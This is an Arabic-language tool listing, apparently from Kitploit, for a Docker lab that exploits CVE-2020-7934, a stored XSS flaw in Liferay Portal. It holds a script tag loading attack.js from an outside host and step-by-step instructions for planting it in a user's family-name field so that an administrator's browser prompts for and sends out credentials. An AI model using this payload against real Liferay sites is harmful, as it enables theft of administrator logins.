audit-xss-cve-2020-7934 — استغلال XSS قائم على Docker لـ CVE-2020-7934 يستهدف بوابة Liferay. يوضح تخزين النصوص البرمجية عبر المواقع من خلال حقول ملف تعريف المستخدم لسرقة بيانات اعتماد المسؤول. | Kitploit
استغلال XSS قائم على Docker لـ CVE-2020-7934 يستهدف بوابة Liferay. يوضح تخزين النصوص البرمجية عبر المواقع من خلال حقول ملف تعريف المستخدم لسرقة بيانات اعتماد المسؤول.
من الممكن وضع سكريبت الهجوم على الإنترنت (مع كود js) http://yourjavascript.com/
سكريبت Js الخاص بنا على الإنترنت للهجوم
html <script src="http://yourjavascript.com/920172199111/attack.js"></script>
أوامر التهيئة
انتقل إلى المجلد الجذر لهذا المشروع
شغل "sudo docker-compose up --build"
طرفية جديدة: شغل "docker inspect liferay" ==> وانسخ قيمة IPAddress
طرفية جديدة: شغل "python api_attacker.py"
افتح متصفحًا واذهب إلى "http://IPAddress:8080" ==> يجب أن تحصل على بوابة liferay كاستجابة
لإيقاف وحذف الحاويات استخدم "sudo docker-compose rm"
تعليمات الهجوم
سجل في liferay كمستخدم، وسجل الدخول، وفي قسم "المواقع المتاحة"، انضم إلى موقع "liferay".
غيّر "اسم العائلة" في سكريبت JS (مباشرة () أو من خلال "src =" http ... "")
سجل الدخول كمسؤول liferay (اسم المستخدم: [email protected]، كلمة المرور: test)
اذهب إلى المواقع المتاحة وانقر على "liferay"، ستفتح الصفحة العامة لهذا الموقع.
اذهب إلى الصفحة الجديدة، ستظهر قائمة على اليمين، انقر على "العضوية".
حدد المستخدم المسجل في الخطوة 1. في تلك اللحظة سيتم تنفيذ السكريبت.
5.1) في سكريبت attack.js ستطلب الصفحة بيانات الاعتماد.
في طرفية الخطوة 5 (من أوامر التهيئة) سيتم طباعة اسم المستخدم/كلمة المرور التي تم إدخالها في 5.1 (من قبل المسؤول) )